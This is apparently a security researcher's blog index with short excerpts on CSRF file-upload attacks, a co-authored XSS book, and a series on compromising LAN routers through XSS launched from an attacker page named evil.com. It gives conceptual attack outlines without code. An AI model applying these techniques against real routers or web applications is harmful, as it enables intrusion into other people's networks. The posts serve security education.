Cross-site File Upload Attacks

As you probably already know, CSRF attack are only possible when the attacked web application does not have an additional mechanism to ensure that requests towards it are genuine. In order to do that, the web developer must include a unique token for each request, which is validated on the server upon receiving a request. [...]

more | comments | comments rss | posted by

XSS Attacks – Cross Site Scripting Exploits and Defence

XSS Attacks – Cross Site Scripting Exploits and Defence is a book project that I was involved into, together with Jeremiah Grossman, Robert RSnake Hansen, Anton Rager and last but not least, Seth Forgie – technical editor and coauthor. I must say, that the project was a lot of fun mashed with hard work and numerous sleepless nights. [...]

more | comments | comments rss | posted by

Author of the XSS Book

It is probably about time to announce that I am one of the authors of the upcoming XSS Book, RSnake talked about a month ago on his blog. The complete list of authors is: Seth Fogie, Jeremiah Grossman, Robert Hansen, Anton Rager and Petko Petkov (a.k.a me).

The book is going quite well and I hope that it will provide a good starting point for those who are interested in getting into client-side web security but don’t know much about it. [...]

more | comments | comments rss | posted by

XSSing the Lan 4

Trust is a beautiful concept that rarely finds application in real life. Unfortunately, trust is all we’ve got when dealing with computers: username, password, master I am here to serve you; neither semantics nor pragmatics. The browser security model is kind of based on trust. The browser trusts websites that you trust. It relies on our judgment which is wrong most of the time. [...]

more | comments | comments rss | posted by

XSSing the Lan 3

In my previous posts I mentioned that in order to compromise a LAN device from the Internet the attacker needs to exploit a XSS vulnerability in the device firmware. The limitations of this kind of attack are quite obvious. Let’s have a look at the exploitation process again.

First of all the local LAN needs to be explored for live hosts and than each host needs to be scanned with a URL Signature database in order to detect the firmware type and version. [...]

more | comments | comments rss | posted by

XSSing the Lan 2

In order to perform browser based attacks, JavaScript is most definitely required with a number of restrictions of course. Flash 7 has the flexibility to perform cross domain requests without restrictions, however this is sort of fixed in Flash Player 8. Java applets are quite the same in that respect. In certain situations it might be possible to trick the browser into doing what ever you want, but this is a different story. [...]

more | comments | comments rss | posted by

XSSing the Lan

Since there is a growing interest in XSS (Cross-site Scripting) attacks, I will try to put in theory how border routers/gateways can be trivially compromised over the web. For the purpose of this, three prerequisites need to be met: a page that is controlled by the attacker, lets call it evil.com; router vulnerable to XSS; user attending evil.com.

Once the user visits evil.com a malicious JavaScript code executes to find what machines are alive on the LAN and where the router is located. [...]

more | comments | comments rss | posted by